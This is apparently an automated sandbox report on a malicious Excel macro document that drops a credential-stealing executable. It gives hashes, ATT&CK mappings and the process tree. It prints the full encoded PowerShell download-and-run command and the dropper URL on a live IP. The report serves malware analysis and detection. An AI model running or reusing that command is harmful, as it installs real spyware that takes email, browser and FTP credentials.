3b437baa9a07e9dece2659f20b5d97f8f729ba077d399933041cdc656c8d4d04

General

Target

SOA# 1769.xlsm
Size

363KB
MD5

08188e5102d3824ad530a21c1b25ad97
SHA1

1d5fb4b5a63f16d2c8bde8e42f9bc15fc8e1ff03
SHA256

3b437baa9a07e9dece2659f20b5d97f8f729ba077d399933041cdc656c8d4d04
SHA512

952e868c3557ee47cdb44d01202bdb476a6baac8b54d30af6ddc29f3cfcb5717ae7eda0cbafdf515e1f2b9ed49209455ea8b95f19092aaee97e3587cd2e8c814

Score

10^/10

collection spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://3.64.251.139/v3/2/Requests07520000652.exe

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2648	3592	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

14 4580 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

Wheahmnfpgaqse.exeWheahmnfpgaqse.exeWheahmnfpgaqse.exeWheahmnfpgaqse.exe

pid process

5004 Wheahmnfpgaqse.exe
3512 Wheahmnfpgaqse.exe
940 Wheahmnfpgaqse.exe
2320 Wheahmnfpgaqse.exe
Deletes itself 1 IoCs

Processes:

EXCEL.EXE

pid process

3592 EXCEL.EXE
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
14	4580	powershell.exe

pid	process
5004	Wheahmnfpgaqse.exe
3512	Wheahmnfpgaqse.exe
940	Wheahmnfpgaqse.exe
2320	Wheahmnfpgaqse.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

Wheahmnfpgaqse.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Wheahmnfpgaqse.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Wheahmnfpgaqse.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Wheahmnfpgaqse.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

38 checkip.dyndns.org
41 freegeoip.app
42 freegeoip.app
Suspicious use of SetThreadContext 1 IoCs

Processes:

Wheahmnfpgaqse.exe

description pid process target process

PID 5004 set thread context of 2320 5004 Wheahmnfpgaqse.exe Wheahmnfpgaqse.exe

flow	ioc
38	checkip.dyndns.org
41	freegeoip.app
42	freegeoip.app

description	pid	process	target process
PID 5004 set thread context of 2320	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

NTFS ADS 1 IoCs

Processes:

EXCEL.EXE

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\4CA57F00\:Zone.Identifier:$DATA EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3592 EXCEL.EXE

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\4CA57F00\:Zone.Identifier:$DATA	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exeWheahmnfpgaqse.exeWheahmnfpgaqse.exe

pid	process
4580	powershell.exe
4580	powershell.exe
4580	powershell.exe
5004	Wheahmnfpgaqse.exe
5004	Wheahmnfpgaqse.exe
5004	Wheahmnfpgaqse.exe
5004	Wheahmnfpgaqse.exe
5004	Wheahmnfpgaqse.exe
5004	Wheahmnfpgaqse.exe
5004	Wheahmnfpgaqse.exe
5004	Wheahmnfpgaqse.exe
5004	Wheahmnfpgaqse.exe
5004	Wheahmnfpgaqse.exe
2320	Wheahmnfpgaqse.exe

Suspicious behavior: RenamesItself 1 IoCs

Processes:

EXCEL.EXE

pid process

3592 EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeWheahmnfpgaqse.exeWheahmnfpgaqse.exe

description	pid	process
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	5004	Wheahmnfpgaqse.exe
Token: SeDebugPrivilege	2320	Wheahmnfpgaqse.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

3592 EXCEL.EXE
3592 EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
3592	EXCEL.EXE
3592	EXCEL.EXE
3592	EXCEL.EXE
3592	EXCEL.EXE
3592	EXCEL.EXE
3592	EXCEL.EXE
3592	EXCEL.EXE
3592	EXCEL.EXE
3592	EXCEL.EXE
3592	EXCEL.EXE
3592	EXCEL.EXE
3592	EXCEL.EXE

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeWheahmnfpgaqse.exe

description	pid	process	target process
PID 3592 wrote to memory of 2648	3592	EXCEL.EXE	cmd.exe
PID 3592 wrote to memory of 2648	3592	EXCEL.EXE	cmd.exe
PID 2648 wrote to memory of 4580	2648	cmd.exe	powershell.exe
PID 2648 wrote to memory of 4580	2648	cmd.exe	powershell.exe
PID 4580 wrote to memory of 5004	4580	powershell.exe	Wheahmnfpgaqse.exe
PID 4580 wrote to memory of 5004	4580	powershell.exe	Wheahmnfpgaqse.exe
PID 4580 wrote to memory of 5004	4580	powershell.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 3512	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 3512	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 3512	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 940	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 940	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 940	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 2320	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 2320	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 2320	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 2320	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 2320	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 2320	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 2320	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe
PID 5004 wrote to memory of 2320	5004	Wheahmnfpgaqse.exe	Wheahmnfpgaqse.exe

outlook_office_path 1 IoCs

Processes:

Wheahmnfpgaqse.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Wheahmnfpgaqse.exe

outlook_win_path 1 IoCs

Processes:

Wheahmnfpgaqse.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Wheahmnfpgaqse.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SOA# 1769.xlsm"
1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Gqyztfbtsogpnruooqr.bat
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBXAGgAZQBhAGgAbQBuAGYAcABnAGEAcQBzAGUALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwAzAC4ANgA0AC4AMgA1ADEALgAxADMAOQAvAHYAMwAvADIALwBSAGUAcQB1AGUAcwB0AHMAMAA3ADUAMgAwADAAMAAwADYANQAyAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4580

C:\Users\Admin\AppData\Roaming\Wheahmnfpgaqse.exe
"C:\Users\Admin\AppData\Roaming\Wheahmnfpgaqse.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5004

C:\Users\Admin\AppData\Local\Temp\Wheahmnfpgaqse.exe
C:\Users\Admin\AppData\Local\Temp\Wheahmnfpgaqse.exe
5⤵
- Executes dropped EXE
PID:3512

C:\Users\Admin\AppData\Local\Temp\Wheahmnfpgaqse.exe
C:\Users\Admin\AppData\Local\Temp\Wheahmnfpgaqse.exe
5⤵
- Executes dropped EXE
PID:940

C:\Users\Admin\AppData\Local\Temp\Wheahmnfpgaqse.exe
C:\Users\Admin\AppData\Local\Temp\Wheahmnfpgaqse.exe
5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2320

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

3

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wheahmnfpgaqse.exe.log

MD5
808e884c00533a9eb0e13e64960d9c3a

SHA1
279d05181fc6179a12df1a669ff5d8b64c1380ae

SHA256
2f6a0aab99b1c228a6642f44f8992646ce84c5a2b3b9941b6cf1f2badf67bdd6

SHA512
9489bdb2ffdfeef3c52edcfe9b34c6688eba53eb86075e0564df1cd474723c86b5b5aedc12df1ff5fc12cf97bd1e3cf9701ff61dc4ce90155d70e9ccfd0fc299

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wheahmnfpgaqse.exe

MD5
99a0109485e8ca6d9ee2b809390d89b8

SHA1
ea89519b812adc5dff90531a6c64c987d6d109d8

SHA256
53d520c1f12fe4e479c6e31626f7d4aba5a65d107c1a13401380ebca7cca5b05

SHA512
5ec47bef15f1521c2cb5dc14a59c11dde14bd693f7df64991bb1268305eff03c8e0adc5fa6e2ddd6d5eecd1f9ac5c5ea0a90f4c6c6349348afb97a42a43fede8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wheahmnfpgaqse.exe

MD5
99a0109485e8ca6d9ee2b809390d89b8

SHA1
ea89519b812adc5dff90531a6c64c987d6d109d8

SHA256
53d520c1f12fe4e479c6e31626f7d4aba5a65d107c1a13401380ebca7cca5b05

SHA512
5ec47bef15f1521c2cb5dc14a59c11dde14bd693f7df64991bb1268305eff03c8e0adc5fa6e2ddd6d5eecd1f9ac5c5ea0a90f4c6c6349348afb97a42a43fede8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wheahmnfpgaqse.exe

MD5
99a0109485e8ca6d9ee2b809390d89b8

SHA1
ea89519b812adc5dff90531a6c64c987d6d109d8

SHA256
53d520c1f12fe4e479c6e31626f7d4aba5a65d107c1a13401380ebca7cca5b05

SHA512
5ec47bef15f1521c2cb5dc14a59c11dde14bd693f7df64991bb1268305eff03c8e0adc5fa6e2ddd6d5eecd1f9ac5c5ea0a90f4c6c6349348afb97a42a43fede8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wheahmnfpgaqse.exe

MD5
99a0109485e8ca6d9ee2b809390d89b8

SHA1
ea89519b812adc5dff90531a6c64c987d6d109d8

SHA256
53d520c1f12fe4e479c6e31626f7d4aba5a65d107c1a13401380ebca7cca5b05

SHA512
5ec47bef15f1521c2cb5dc14a59c11dde14bd693f7df64991bb1268305eff03c8e0adc5fa6e2ddd6d5eecd1f9ac5c5ea0a90f4c6c6349348afb97a42a43fede8

Download Submit
C:\Users\Admin\AppData\Roaming\Wheahmnfpgaqse.exe

MD5
99a0109485e8ca6d9ee2b809390d89b8

SHA1
ea89519b812adc5dff90531a6c64c987d6d109d8

SHA256
53d520c1f12fe4e479c6e31626f7d4aba5a65d107c1a13401380ebca7cca5b05

SHA512
5ec47bef15f1521c2cb5dc14a59c11dde14bd693f7df64991bb1268305eff03c8e0adc5fa6e2ddd6d5eecd1f9ac5c5ea0a90f4c6c6349348afb97a42a43fede8

Download Submit
C:\Users\Admin\AppData\Roaming\Wheahmnfpgaqse.exe

MD5
99a0109485e8ca6d9ee2b809390d89b8

SHA1
ea89519b812adc5dff90531a6c64c987d6d109d8

SHA256
53d520c1f12fe4e479c6e31626f7d4aba5a65d107c1a13401380ebca7cca5b05

SHA512
5ec47bef15f1521c2cb5dc14a59c11dde14bd693f7df64991bb1268305eff03c8e0adc5fa6e2ddd6d5eecd1f9ac5c5ea0a90f4c6c6349348afb97a42a43fede8

Download Submit
C:\Users\Admin\Documents\Gqyztfbtsogpnruooqr.bat

MD5
36eccc7340834b4a23e4484066a64a31

SHA1
42b61ba3a0b4d30f157865f62f6957240d8f866c

SHA256
2bcdcf59454285a14854bf6629b09efa799b006eec2629402f7556f2e3f312d4

SHA512
309d73c31bdfaa1ef7543126fdddd7e5f538046df971c5b6818d530562f95a4a39b34f18653431d7d2307d9f89ef3735e5c950723a34562bb96fe2acb0be849f

Download Submit
memory/2320-314-0x0000000004F90000-0x000000000548E000-memory.dmp

Filesize
5.0MB

Download
memory/2320-306-0x000000000042040E-mapping.dmp

Download
memory/2648-257-0x0000000000000000-mapping.dmp

Download
memory/3592-121-0x00000163E7B80000-0x00000163E7B82000-memory.dmp

Filesize
8KB

Download
memory/3592-119-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmp

Filesize
64KB

Download
memory/3592-116-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmp

Filesize
64KB

Download
memory/3592-117-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmp

Filesize
64KB

Download
memory/3592-118-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmp

Filesize
64KB

Download
memory/3592-120-0x00000163E7B80000-0x00000163E7B82000-memory.dmp

Filesize
8KB

Download
memory/3592-115-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmp

Filesize
64KB

Download
memory/3592-122-0x00000163E7B80000-0x00000163E7B82000-memory.dmp

Filesize
8KB

Download
memory/4580-263-0x0000000000000000-mapping.dmp

Download
memory/4580-269-0x0000023153383000-0x0000023153385000-memory.dmp

Filesize
8KB

Download
memory/4580-268-0x0000023153380000-0x0000023153382000-memory.dmp

Filesize
8KB

Download
memory/4580-287-0x0000023153386000-0x0000023153388000-memory.dmp

Filesize
8KB

Download
memory/5004-300-0x00000000051D0000-0x00000000051D1000-memory.dmp

Filesize
4KB

Download
memory/5004-294-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads